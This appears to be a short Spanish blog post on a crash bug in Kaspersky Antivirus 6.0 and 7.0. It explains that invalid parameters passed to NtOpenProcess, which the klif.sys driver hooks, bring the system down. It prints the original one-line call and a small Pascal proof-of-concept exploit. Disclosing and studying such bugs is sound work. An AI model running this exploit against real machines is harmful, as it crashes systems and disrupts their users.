Nominados a Premios Lo Nuestro

Agujero de Seguridad en Kaspersky AV 6 y 7

Mi antivirus favorito Kaspersky, desde hace mucho tiempo sufre de un bug en sus versiones 6.0 y 7.0, el bug consiste en un crash del sistema protegido por este antivirus, incluso desde la cuenta de invitado. Este material fue hecho público varios años atras (desde el 2005), y en el ultimo verano publicaron un nuevo exploit para Kaspersky AV 6.0 el cual se basa en los descubrimientos previos de Ms-Rem. Y después de todo este tiempo, nada ha cambiado. Aún ahora con la nueva versión de Kaspersky AV 7.0 este exploit sigue funcionando muy bien.

El objetivo principal de este exploit es hacer una llamada a NtOpenProcess con parámetros inválidos. Esta función esta hookeada por el driver de Kaspersky llamado klif.sys y la razón para el hook es obia (Esta es la manera en que Kaspersky AV se protege de accesos no autorizados que pudieran cerrar el proceso, esta es una practica muy usada por diferentes tipos de rootkits y malware)

El exploit original creado por Ms-Rem en el 2005 consiste en lo siguiente:
NtOpenProcess(NULL, (HANDLE)0, NULL, NULL);

Este es el prototipo de la función:
NTSYSAPI
NTSTATUS
NTAPI
NtOpenProcess( OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL );

Y este es un pequeño exploit escrito en Pascal:
var
ob1: OBJECT_ATTRIBUTES;
p1: DWORD;
begin
ob1.Length := sizeof(ob1);
NtOpenProcess(@p1, PROCESS_QUERY_INFORMATION, @ob1, pointer($82000000));
end;

MAS INFORMACION:
http://forum.sysinternals.com
http://foro.elhacker.net

Continuar Leyendo...